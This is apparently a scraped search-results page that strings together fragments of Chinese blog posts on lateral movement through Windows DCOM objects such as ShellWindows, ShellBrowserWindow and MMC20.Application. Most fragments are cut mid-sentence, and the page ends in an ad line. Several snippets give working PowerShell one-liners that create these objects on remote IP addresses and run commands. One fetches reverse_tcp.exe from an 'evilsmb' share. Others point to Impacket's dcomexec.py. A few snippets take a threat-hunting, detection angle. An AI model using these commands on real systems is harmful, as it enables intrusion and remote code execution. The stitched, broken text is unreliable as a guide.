Threat Hunting#16 — 通过 DCOM 的 ShellWindows & ShellBrowserWindow 进行横向渗透 Windows 分布式组件对象模型(DCOM)是一种透明的中间件...在本篇文章中,我们将主要关注与以下两个 COM 对象的使用相关的关键检测指标: ShellWindows(clsid=9ba05972-f6a8-11cf-a442-00a0c90a8f39) shellbrowserwindow
我们可以看到shellwindows和shellBrowserWindows都好像存在利用点。...那么我们可以开始构造利用语法: $a = [type]::GetTypeFromProgID("shellwindows") $b = [activator]::createInstance($a) |...从微软文档中我们可以看到GetTypeFromProgID需要指定一个ProgID值,而Shellwindows明显不是ProgID值,所以没办法定位到。...RegisterXLL ExecuteLine NewCurrentDatabase Service Create Run Exec Invoke File Method Explore ok 翻东西不多说 我们拿到了ShellWindows...与大多数其他方法不同,ShellWindows不会创建进程。相反,它会激活现有explorer.exe进程内部的类实例,该进程执行子进程。
除了MMC20.Application,还有ShellWindows、ShellBrowserWindow、Excel.Application以及Outlook.Application等等都可以为我们所利用...(2)调用ShellWindows远程执行命令 实验环境: 还是上面那个实验环境,同样还是先控制跳板机Windows 7通过ipc连接到内网主机Windows Server 2008,并控制Windows7...powershell,控制Windows7对Windows Server 2008执行远程命令,执行位于Windows Server 2008的c盘里的马: # 通过PowerShell与DCOM进行远程交互,创建ShellWindows...除了MMC20.Application和ShellWindows,还有以下这几种DCOM对象都可以被我们利用。...dcomexec.py脚本 Impacket 里面提供的 dcomexec.py 脚本可以提供一个类似于 wmiexec.py 脚本的半交互式shell,但使用的是DCOM,目前支持MMC20.Application,ShellWindows
当前支持的方法有:MMC20.Application、ShellWindows、ShellBrowserWindow、ExcelDDE、VisioAddonEx、OutlookShellEx、ExcelXLL...args=VALUE Arguments: -enc -m, --method=VALUE Methods: MMC20Application, ShellWindows
我们也可以使用wmic查询 wmic /NAMESPACE:"\\root\CIMV2" PATH Win32_DCOMApplication GET /all /FORMAT:list 2.2 ShellWindows...Get-CimInstance Win32_DCOMApplication | findstr "ShellWindows" 得到CLSID {9BA05972-F6A8-11CF-A442-00A0C90A8F39
ComponentsWindows Remote Procedure Call RuntimeWindows Security Account ManagerWindows Server ServiceWindows ShellWindows
192.168.75.130")).Document.ActiveView.Executeshellcommand('cmd.exe',$null,"/c calc.exe","Restored") 3.SHELLWINDOWS...创建ShellWindows对象的实例: $a = [activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442...c:\windows32\system",$null,0) 说明: 与大多数其他方法不同,ShellWindows不会创建进程。...C08AFD90-F2A1-11D1-8455-00A0C91F3880","192.168.75.130")).Document.Application.shellExecute("calc.exe") 与ShellWindows
wbemdisp.dll and modload:fastprox.dll 方法二:ShellBrowserWindow / ShellBrowser COM Objects Macro 代码利用下面 COM 对象: ShellWindows
DCOM横向渗透方法论; 缓解方案; 引言 在此之前,关于DCOM横向渗透技术的内容讨论了已经有一年半载了,Matt Nelson (enigma0x3)此前也介绍过多种利用D/COM对象(例如MMC20、ShellWindows
目前支持MMC20.Application,ShellWindows和ShellBrowserWindow对象。
除了MMC20.Application,还有ShellWindows、ShellBrowserWindow、Excel.Application以及Outlook.Application等等都可以为我们所利用
com.Document.Activeview.ExecuteShellCommand('cmd.exe',$null,"/c \\192.168.26.20\evilsmb\reverse_tcp.exe","Minimized") ShellWindows
com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,"/c calc.exe","Minimized") 除了 MMC20.Application 还有 ShellWindows...192.168.7.7")).Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,"/c calc.exe","Minimized") 2、调用 ShellWindows...除了 MMC20.Application 和 ShellWindows,还有以下这几种 DCOM 对象可以被利用。...工具包里也提供了 DCOM 的利用脚本,该脚本可以提供一个类似于 wmiexec.py 脚本的半交互式 shell,不过使用的是 DCOM dcomexec.py 脚本目前支持 MMC20.Application、ShellWindows
领取专属 10元无门槛券
手把手带您无忧上云